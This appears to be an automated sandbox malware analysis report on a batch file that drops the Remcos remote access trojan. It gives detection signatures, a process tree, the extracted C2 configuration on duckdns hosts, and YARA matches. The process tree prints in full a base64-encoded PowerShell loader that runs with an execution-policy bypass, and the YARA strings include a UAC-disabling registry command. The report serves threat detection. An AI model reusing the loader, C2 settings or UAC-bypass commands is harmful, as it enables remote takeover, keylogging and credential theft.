Edit tour

Windows Analysis Report
z310517827.bat

Overview

General Information

Sample name:	z310517827.bat
Analysis ID:	1640228
MD5:	d8302b001f73f0f0648a7e00dc2552b5
SHA1:	0b66f1baf0f419881be7ae7f3485621e2b4cbb20
SHA256:	1b3c82f59f90bd345f290cee52f0b80858545abd6fdb8c319ebbe0066a6a39ff
Tags:	batRemcosRATuser-Porcupine
Infos:

Detection

Batch Injector, Remcos

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Batch Injector

Yara detected Powershell decode and execute

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

.NET source code references suspicious native API functions

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Found suspicious powershell code related to unpacking or dynamic code loading

Installs a global keyboard hook

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: PowerShell Base64 Encoded Invoke Keyword

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses dynamic DNS services

Yara detected WebBrowserPassView password recovery tool

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 7816 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z310517827.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7896 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\z310517827.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7976 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZHdtLmJrbHJncmF0Ijtpa2xyZ3JmIChUZWtscmdyc3QtUGFrbHJncnRoICRqa2xyZ3JtZG9tKWtscmdyIHsgICBrbHJnciBXcml0a2xyZ3JlLUhvc2tscmdydCAiQmFrbHJncnRjaCBma2xyZ3JpbGUgZmtscmdyb3VuZDprbHJnciAkam1ka2xyZ3JvbSIgLWtscmdyRm9yZWdrbHJncnJvdW5ka2xyZ3JDb2xvcmtscmdyIEN5YW5rbHJncjsgICAga2xyZ3IkZmlsZWtscmdyTGluZXNrbHJnciA9IFtTa2xyZ3J5c3RlbWtscmdyLklPLkZrbHJncmlsZV06a2xyZ3I6UmVhZGtscmdyQWxsTGlrbHJncm5lcygka2xyZ3JqbWRvbWtscmdyLCBbU3lrbHJncnN0ZW0ua2xyZ3JUZXh0LmtscmdyRW5jb2RrbHJncmluZ106a2xyZ3I6VVRGOGtscmdyKTsgICBrbHJnciBmb3Jla2xyZ3JhY2ggKGtscmdyJGxpbmVrbHJnciBpbiAka2xyZ3JmaWxlTGtscmdyaW5lcylrbHJnciB7ICAga2xyZ3IgICAgIGtscmdyaWYgKCRrbHJncmxpbmUga2xyZ3ItbWF0Y2tscmdyaCAnXjprbHJncjo6ID8oa2xyZ3IuKykkJ2tscmdyKSB7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyV3JpdGVrbHJnci1Ib3N0a2xyZ3IgIkluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlIGRldGtscmdyZWN0ZWRrbHJnciBpbiB0a2xyZ3JoZSBiYWtscmdydGNoIGZrbHJncmlsZS4ia2xyZ3IgLUZvcmtscmdyZWdyb3VrbHJncm5kQ29sa2xyZ3JvciBDeWtscmdyYW47ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdydHJ5IHtrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAkZGVja2xyZ3JvZGVkQmtscmdyeXRlcyBrbHJncj0gW1N5a2xyZ3JzdGVtLmtscmdyQ29udmVrbHJncnJ0XTo6a2xyZ3JGcm9tQmtscmdyYXNlNjRrbHJnclN0cmlua2xyZ3JnKCRtYWtscmdydGNoZXNrbHJnclsxXS5Ua2xyZ3JyaW0oKWtscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgJGlrbHJncm5qZWN0a2xyZ3Jpb25Db2tscmdyZGUgPSBrbHJncltTeXN0a2xyZ3JlbS5UZWtscmdyeHQuRW5rbHJncmNvZGlua2xyZ3JnXTo6VWtscmdybmljb2RrbHJncmUuR2V0a2xyZ3JTdHJpbmtscmdyZygkZGVrbHJncmNvZGVka2xyZ3JCeXRlc2tscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgV3JrbHJncml0ZS1Ia2xyZ3Jvc3QgImtscmdySW5qZWNrbHJncnRpb24ga2xyZ3Jjb2RlIGtscmdyZGVjb2RrbHJncmVkIHN1a2xyZ3JjY2Vzc2tscmdyZnVsbHlrbHJnci4iIC1Ga2xyZ3JvcmVncmtscmdyb3VuZENrbHJncm9sb3Iga2xyZ3JHcmVlbmtscmdyOyAgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICBXcmlrbHJncnRlLUhva2xyZ3JzdCAiRWtscmdyeGVjdXRrbHJncmluZyBpa2xyZ3JuamVjdGtscmdyaW9uIGNrbHJncm9kZS4ua2xyZ3IuIiAtRmtscmdyb3JlZ3JrbHJncm91bmRDa2xyZ3JvbG9yIGtscmdyWWVsbG9rbHJncnc7ICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgIElua2xyZ3J2b2tlLWtscmdyRXhwcmVrbHJncnNzaW9ua2xyZ3IgJGluamtscmdyZWN0aW9rbHJncm5Db2Rla2xyZ3I7ICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3IgIGJyZWtscmdyYWs7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyfSBjYXRrbHJncmNoIHsga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3JXcml0ZWtscmdyLUhvc3RrbHJnciAiRXJya2xyZ3JvciBkdWtscmdycmluZyBrbHJncmRlY29ka2xyZ3Jpbmcgb2tscmdyciBleGVrbHJncmN1dGlua2xyZ3JnIGluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlOiAkX2tscmdyIiAtRm9rbHJncnJlZ3Jva2xyZ3J1bmRDb2tscmdybG9yIFJrbHJncmVkOyAga2xyZ3IgICAgIGtscmdyICAgICBrbHJncn07ICAga2xyZ3IgICAgIGtscmdyfTsgICBrbHJnciB9O30ga2xyZ3JlbHNlIGtscmdyeyAgICBrbHJnciAgV3Jpa2xyZ3J0ZS1Ib2tscmdyc3QgIlNrbHJncnlzdGVta2xyZ3IgRXJyb2tscmdycjogQmFrbHJncnRjaCBma2xyZ3JpbGUgbmtscmdyb3QgZm9rbHJncnVuZDoga2xyZ3Ikam1kb2tscmdybSIgLUZrbHJncm9yZWdya2xyZ3JvdW5kQ2tscmdyb2xvciBrbHJnclJlZDsga2xyZ3IgICBleGtscmdyaXQ7fTtrbHJncmZ1bmN0a2xyZ3Jpb24gemtscmdyaWh0ZyhrbHJnciRwYXJha2xyZ3JtX3ZhcmtscmdyKXsJJGFrbHJncmVzX3Zha2xyZ3JyPVtTeWtscmdyc3RlbS5rbHJnclNlY3Vya2xyZ3JpdHkuQ2tscmdycnlwdG9rbHJncmdyYXBoa2xyZ3J5LkFlc2tscmdyXTo6Q3JrbHJncmVhdGUoa2xyZ3IpOwkkYWtscmdyZXNfdmFrbHJncnIuTW9ka2xyZ3JlPVtTeWtscmdyc3RlbS5rbHJnclNlY3Vya2xyZ3JpdHkuQ2tscmdycnlwdG9rbHJncmdyYXBoa2xyZ3J5LkNpcGtscmdyaGVyTW9rbHJncmRlXTo6a2xyZ3JDQkM7CWtscmdyJGFlc19rbHJncnZhci5Qa2xyZ3JhZGRpbmtscmdyZz1bU3lrbHJncnN0ZW0ua2xyZ3JTZWN1cmtscmdyaXR5LkNrbHJncnJ5cHRva2xyZ3JncmFwaGtscmdyeS5QYWRrbHJncmRpbmdNa2xyZ3JvZGVdOmtscmdyOlBLQ1NrbHJncjc7CSRha2xyZ3Jlc192YWtscmdyci5LZXlrbHJncj1bU3lza2xyZ3J0ZW0uQ2tscmdyb252ZXJrbHJncnRdOjpGa2xyZ3Jyb21CYWtscmdyc2U2NFNrbHJncnRyaW5na2xyZ3IoJzRFT2tscmdyVWQ2bTdrbHJncmRaempBa2xyZ3IwWXpGS2tscmdyVFBtWXlrbHJncmxpWmVDa2xyZ3JQaFMxTWtscmdyY3V5SHlrbHJncjNRVEV3a2xyZ3I9Jyk7CWtscmdyJGFlc19rbHJncnZhci5Ja2xyZ3JWPVtTeWtscmdyc3RlbS5rbHJnckNvbnZla2xyZ3JydF06OmtscmdyRnJvbUJrbHJncmFzZTY0a2xyZ3JTdHJpbmtscmdyZygnVzhrbHJncm1BT1Fha2xyZ3J2ckgxV2tscmdySTBUWEprbHJnckdMQUp3a2xyZ3I9PScpO2tscmdyCSRkZWNrbHJncnJ5cHRva2xyZ3JyX3ZhcmtscmdyPSRhZXNrbHJncl92YXIua2xyZ3JDcmVhdGtscmdyZURlY3JrbHJncnlwdG9ya2xyZ3IoKTsJJGtscmdycmV0dXJrbHJncm5fdmFya2xyZ3I9JGRlY2tscmdycnlwdG9rbHJncnJfdmFya2xyZ3IuVHJhbmtscmdyc2Zvcm1rbHJnckZpbmFsa2xyZ3JCbG9ja2tscmdyKCRwYXJrbHJncmFtX3Zha2xyZ3JyLCAwLGtscmdyICRwYXJrbHJncmFtX3Zha2xyZ3JyLkxlbmtscmdyZ3RoKTtrbHJncgkkZGVja2xyZ3JyeXB0b2tscmdycl92YXJrbHJnci5EaXNwa2xyZ3Jvc2UoKWtscmdyOwkkYWVrbHJncnNfdmFya2xyZ3IuRGlzcGtscmdyb3NlKClrbHJncjsJJHJla2xyZ3J0dXJuX2tscmdydmFyO31rbHJncmZ1bmN0a2xyZ3Jpb24gZWtscmdyYnFxeChrbHJnciRwYXJha2xyZ3JtX3ZhcmtscmdyKXsJJHBrbHJncnlzbHM9a2xyZ3JOZXctT2tscmdyYmplY3RrbHJnciBTeXN0a2xyZ3JlbS5JT2tscmdyLk1lbW9rbHJncnJ5U3Rya2xyZ3JlYW0oLGtscmdyJHBhcmFrbHJncm1fdmFya2xyZ3IpOwkkYWtscmdydmllcj1rbHJnck5ldy1Pa2xyZ3JiamVjdGtscmdyIFN5c3RrbHJncmVtLklPa2xyZ3IuTWVtb2tscmdycnlTdHJrbHJncmVhbTsJa2xyZ3IkZXZ1dGtscmdybz1OZXdrbHJnci1PYmpla2xyZ3JjdCBTeWtscmdyc3RlbS5rbHJncklPLkNva2xyZ3JtcHJlc2tscmdyc2lvbi5rbHJnckdaaXBTa2xyZ3J0cmVhbWtscmdyKCRweXNrbHJncmxzLCBba2xyZ3JJTy5Db2tscmdybXByZXNrbHJncnNpb24ua2xyZ3JDb21wcmtscmdyZXNzaW9rbHJncm5Nb2Rla2xyZ3JdOjpEZWtscmdyY29tcHJrbHJncmVzcyk7a2xyZ3IJJGV2dWtscmdydG8uQ29rbHJncnB5VG8oa2xyZ3IkYXZpZWtscmdycik7CSRrbHJncmV2dXRva2xyZ3IuRGlzcGtscmdyb3NlKClrbHJncjsJJHB5a2xyZ3JzbHMuRGtscmdyaXNwb3NrbHJncmUoKTsJa2xyZ3IkYXZpZWtscmdyci5EaXNrbHJncnBvc2Uoa2xyZ3IpOwkkYWtscmdydmllci5rbHJnclRvQXJya2xyZ3JheSgpO2tscmdyfWZ1bmNrbHJncnRpb24ga2xyZ3Jramd1bmtscmdyKCRwYXJrbHJncmFtX3Zha2xyZ3JyLCRwYWtscmdycmFtMl9rbHJncnZhcil7a2xyZ3IJJHFob2tscmdybmw9W1NrbHJncnlzdGVta2xyZ3IuUmVmbGtscmdyZWN0aW9rbHJncm4uQXNza2xyZ3JlbWJseWtscmdyXTo6KCdrbHJncmRhb0wna2xyZ3JbLTEuLmtscmdyLTRdIC1rbHJncmpvaW4ga2xyZ3InJykoW2tscmdyYnl0ZVtrbHJncl1dJHBha2xyZ3JyYW1fdmtscmdyYXIpOwlrbHJnciR3c3Rwa2xyZ3JuPSRxaGtscmdyb25sLkVrbHJncm50cnlQa2xyZ3JvaW50O2tscmdyCSR3c3RrbHJncnBuLklua2xyZ3J2b2tlKGtscmdyJG51bGxrbHJnciwgJHBha2xyZ3JyYW0yX2tscmdydmFyKTtrbHJncn0kaG9za2xyZ3J0LlVJLmtscmdyUmF3VUlrbHJnci5XaW5ka2xyZ3Jvd1RpdGtscmdybGUgPSBrbHJnciRqbWRva2xyZ3JtOyR1eGtscmdyemV1PVtrbHJnclN5c3Rla2xyZ3JtLklPLmtscmdyRmlsZV1rbHJncjo6KCd0a2xyZ3J4ZVRsbGtscmdyQWRhZVJrbHJncidbLTEua2xyZ3IuLTExXWtscmdyIC1qb2lrbHJncm4gJycpa2xyZ3IoJGptZGtscmdyb20pLlNrbHJncnBsaXQoa2xyZ3JbRW52aWtscmdycm9ubWVrbHJncm50XTo6a2xyZ3JOZXdMaWtscmdybmUpO2ZrbHJncm9yZWFja2xyZ3JoICgka2tscmdyYnFzdyBrbHJncmluICR1a2xyZ3J4emV1KWtscmdyIHsJaWZrbHJnciAoJGtia2xyZ3Jxc3cuU2tscmdydGFydHNrbHJncldpdGgoa2xyZ3InOjogJ2tscmdyKSkJewlrbHJncgkkaHp3a2xyZ3Jjcj0ka2tscmdyYnFzdy5rbHJnclN1YnN0a2xyZ3JyaW5nKGtscmdyMyk7CQlrbHJncmJyZWFra2xyZ3I7CX19JGtscmdyZ2V6Zm9rbHJncj1bc3Rya2xyZ3JpbmdbXWtscmdyXSRoendrbHJncmNyLlNwa2xyZ3JsaXQoJ2tscmdyXCcpOyRrbHJncmtjZWNqa2xyZ3I9ZWJxcWtscmdyeCAoemlrbHJncmh0ZyAoa2xyZ3JbQ29udmtscmdyZXJ0XTprbHJncjpGcm9ta2xyZ3JCYXNlNmtscmdyNFN0cmlrbHJncm5nKCRna2xyZ3JlemZvW2tscmdyMF0pKSlrbHJncjskY3V0a2xyZ3JiZj1lYmtscmdycXF4IChrbHJncnppaHRna2xyZ3IgKFtDb2tscmdybnZlcnRrbHJncl06OkZya2xyZ3JvbUJhc2tscmdyZTY0U3RrbHJncnJpbmcoa2xyZ3IkZ2V6Zmtscmdyb1sxXSlrbHJncikpO2tqa2xyZ3JndW4gJGtscmdya2NlY2prbHJnciAkbnVsa2xyZ3JsO2tqZ2tscmdydW4gJGNrbHJncnV0YmYga2xyZ3IoLFtzdGtscmdycmluZ1trbHJncl1dICgna2xyZ3IlKicpKWtscmdyOw0KJ0ANCg0KJGRlb2JmdXNjYXRlZCA9ICRzY3JpcHRDb250ZW50IC1yZXBsYWNlICdrbHJncicsICcnDQoNCkludm9rZS1FeHByZXNzaW9uICRkZW9iZnVzY2F0ZWQNCg==')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

recover.exe (PID: 7544 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\ymieiytvun" MD5: D38B657A068016768CA9F3B5E100B472)

recover.exe (PID: 4508 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\bgnxiqeoiwifqy" MD5: D38B657A068016768CA9F3B5E100B472)

recover.exe (PID: 1212 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt" MD5: D38B657A068016768CA9F3B5E100B472)

recover.exe (PID: 1400 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt" MD5: D38B657A068016768CA9F3B5E100B472)

recover.exe (PID: 1208 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt" MD5: D38B657A068016768CA9F3B5E100B472)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["sarok7lmoutsg1.duckdns.org:3990:0", "sarok7lmoutsg1.duckdns.org:3991:1", "sarok7lmoutsg2.duckdns.org:3990:0", "sarok7lmoutsg3.duckdns.org:3990:0", "sarok7lmoutsg4.duckdns.org:3990:0", "sarok7lmoutsg5.duckdns.org:3990:0"], "Assigned name": "Year", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "klmiurtg-1R3I3X", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "kalmzots.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": ""}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\kalmzots.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x14758:$a1: Remcos restarted by watchdog! 0x14da8:$a3: %02i:%02i:%02i:%03i
00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6cfe0:$a1: Remcos restarted by watchdog! 0x6d630:$a3: %02i:%02i:%02i:%03i
00000005.00000002.3689629684.000000000AA0D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x37ae2:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB 0x41cba:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000005.00000002.3674098163.0000000006A82000.00000040.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x7bb9a:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000005.00000002.3668466296.00000000066EE000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x36fb7a:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: powershell.exe PID: 7976	JoeSecurity_BatchInjector	Yara detected Batch Injector	Joe Security
Process Memory Space: powershell.exe PID: 7976	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: powershell.exe PID: 7976	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: powershell.exe PID: 7976	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: powershell.exe PID: 7976	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: powershell.exe PID: 7976	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x227bc:$a1: Remcos restarted by watchdog! 0x7194c:$a1: Remcos restarted by watchdog! 0x22e10:$a3: %02i:%02i:%02i:%03i 0x2324d:$a3: %02i:%02i:%02i:%03i 0x71fa1:$a3: %02i:%02i:%02i:%03i 0x723de:$a3: %02i:%02i:%02i:%03i
Process Memory Space: powershell.exe PID: 7976	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x62b37:$b2: ::FromBase64String( 0x7a34b:$b2: ::FromBase64String( 0x7bfe4:$b2: ::FromBase64String( 0x849f0:$b2: ::FromBase64String( 0x86694:$b2: ::FromBase64String( 0x951ba:$b2: ::FromBase64String( 0xdcb47:$b2: ::FromBase64String( 0xde7e0:$b2: ::FromBase64String( 0x1e1685:$b2: ::FromBase64String( 0x1e19ea:$b2: ::FromBase64String( 0x1e1a4a:$b2: ::FromBase64String( 0x1e1e5b:$b2: ::FromBase64String( 0x1e1e99:$b2: ::FromBase64String( 0x240869:$b2: ::FromBase64String( 0x242502:$b2: ::FromBase64String( 0x247367:$b2: ::FromBase64String( 0x249000:$b2: ::FromBase64String( 0x2dd9de:$b2: ::FromBase64String( 0x2e73f7:$b2: ::FromBase64String( 0x2f9d74:$b2: ::FromBase64String( 0x2fba0d:$b2: ::FromBase64String(
Process Memory Space: recover.exe PID: 7544	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.powershell.exe.b820000.9.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
12.2.recover.exe.400000.0.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
5.2.powershell.exe.b820000.9.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
12.2.recover.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
5.2.powershell.exe.8a51288.5.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.2.powershell.exe.8a51288.5.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
5.2.powershell.exe.8a51288.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
5.2.powershell.exe.8a51288.5.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6bd58:$a1: Remcos restarted by watchdog! 0x6c3a8:$a3: %02i:%02i:%02i:%03i
5.2.powershell.exe.8a51288.5.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x65ff4:$str_a1: C:\Windows\System32\cmd.exe 0x65f70:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65f70:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66470:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66ad8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x66064:$str_b2: Executing file: 0x66e9c:$str_b3: GetDirectListeningPort 0x668c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66a48:$str_b7: \update.vbs 0x6608c:$str_b9: Downloaded file: 0x66078:$str_b10: Downloading file: 0x6611c:$str_b12: Failed to upload file: 0x66e64:$str_b13: StartForward 0x66e84:$str_b14: StopForward 0x669a0:$str_b15: fso.DeleteFile " 0x66934:$str_b16: On Error Resume Next 0x669d0:$str_b17: fso.DeleteFolder " 0x6610c:$str_b18: Uploaded file: 0x660cc:$str_b19: Unable to delete: 0x66968:$str_b20: while fso.FileExists(" 0x665a9:$str_c0: [Firefox StoredLogins not found]
5.2.powershell.exe.8a51288.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65ee8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65e78:$s1: CoGetObject 0x65e8c:$s1: CoGetObject 0x65ea8:$s1: CoGetObject 0x6fc56:$s1: CoGetObject 0x65e38:$s2: Elevation:Administrator!new:
5.2.powershell.exe.8a51288.5.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.2.powershell.exe.8a51288.5.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
5.2.powershell.exe.8a51288.5.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
5.2.powershell.exe.8a51288.5.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6a358:$a1: Remcos restarted by watchdog! 0x6a9a8:$a3: %02i:%02i:%02i:%03i
5.2.powershell.exe.8a51288.5.unpack	REMCOS_RAT_variants	unknown	unknown	0x645f4:$str_a1: C:\Windows\System32\cmd.exe 0x64570:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64570:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a70:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x650d8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64664:$str_b2: Executing file: 0x6549c:$str_b3: GetDirectListeningPort 0x64ec8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65048:$str_b7: \update.vbs 0x6468c:$str_b9: Downloaded file: 0x64678:$str_b10: Downloading file: 0x6471c:$str_b12: Failed to upload file: 0x65464:$str_b13: StartForward 0x65484:$str_b14: StopForward 0x64fa0:$str_b15: fso.DeleteFile " 0x64f34:$str_b16: On Error Resume Next 0x64fd0:$str_b17: fso.DeleteFolder " 0x6470c:$str_b18: Uploaded file: 0x646cc:$str_b19: Unable to delete: 0x64f68:$str_b20: while fso.FileExists(" 0x64ba9:$str_c0: [Firefox StoredLogins not found]
